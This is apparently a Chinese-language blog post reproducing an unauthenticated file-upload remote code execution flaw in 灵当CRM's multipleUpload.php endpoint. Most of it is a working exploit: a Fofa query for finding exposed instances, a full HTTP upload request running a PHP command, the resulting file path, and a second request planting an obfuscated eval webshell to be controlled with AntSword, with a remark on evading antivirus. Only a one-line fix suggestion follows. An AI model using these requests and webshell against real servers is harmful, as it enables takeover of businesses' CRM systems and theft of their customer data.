灵当CRM multipleUpload.php 文件上传致RCE漏洞复现

0x01 产品描述:

灵当CRM是一款专为中小企业量身定制的智能客户关系管理工具,由上海灵当信息科技有限公司开发和运营。该系统广泛应用于多个行业,包括金融、教育、医疗、IT服务及房地产等领域,旨在满足企业对客户个性化管理的需求,从而增强市场竞争力。

灵当CRM提供了一系列解决方案,支持新客户开拓、老客户维护、销售过程管理和服务管理等多方面的功能。通过有效地识别潜在客户并制定相应的营销策略,企业能够更好地拓展业务。同时,该系统也注重客户的持续互动与反馈,提升客户忠诚度。销售过程中的监控和优化可以显著提高成交率,而完善的售后服务管理则进一步增强客户满意度。

0x02 漏洞描述:

灵当CRM mulipleUpload.php 接口存在任意文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

0x03 搜索语句:

Fofa:body="include/js/ldAjax.js"

0x04 漏洞复现:

POST /crm/modules/Home/multipleUpload.php?myatt_id=1&myatt_moduel=1 HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR

------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php system("whoami");unlink(__FILE__);?>
------WebKitFormBoundaryj7OlOPiiukkdktZR--

根据ip拼接上传路径地址进行访问

http://your-ip:port/crm/storage/2024/September/week4/1.php

shell上传

构造一下php webshell,根据系统不同可能需要用到免杀。

POST /crm/modules/Home/multipleUpload.php?myatt_id=1&myatt_moduel=1 HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryj7OlOPiiukkdktZR

------WebKitFormBoundaryj7OlOPiiukkdktZR
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php class Gu7288x6 { public function __construct($H7858){ @eval("/*ZN812Hsl8S*/".$H7858."/*ZN812Hsl8S*/"); }}new Gu7288x6($_REQUEST['cmd']);?>
------WebKitFormBoundaryj7OlOPiiukkdktZR--

文件上传成功后 使用蚁剑建立连接

0x05 修复建议:

关闭互联网暴露面或接口设置访问权限

相关推荐
wjs20245 分钟前
CentOS Docker 安装
开发语言
阿熊不会编程32 分钟前
【计网】自定义协议与序列化(一) —— Socket封装于服务器端改写
linux·开发语言·网络·c++·设计模式
小牛itbull34 分钟前
Mono Repository方案与ReactPress的PNPM实践
开发语言·前端·javascript·reactpress
阳光帅气男孩36 分钟前
thinkphp中对请求封装
php
jokerest1231 小时前
pwn——test_your_nc1——测试
开发语言·php
碧海蓝天20221 小时前
接上一主题,C++14中如何设计类似于std::any,使集合在C++中与Python一样支持任意数据?
开发语言·c++·python
周杰伦fans1 小时前
Java与C#
java·开发语言·c#
SAP学习成长之路1 小时前
SAP 零售方案 CAR 系统的介绍与研究
大数据·开发语言·sap·abap·零售·car·bapi
A_Tai23333332 小时前
MyBatis高级扩展
java·开发语言·mybatis
夏子曦2 小时前
java虚拟机——频繁发生Full GC的原因有哪些?如何避免发生Full GC
java·开发语言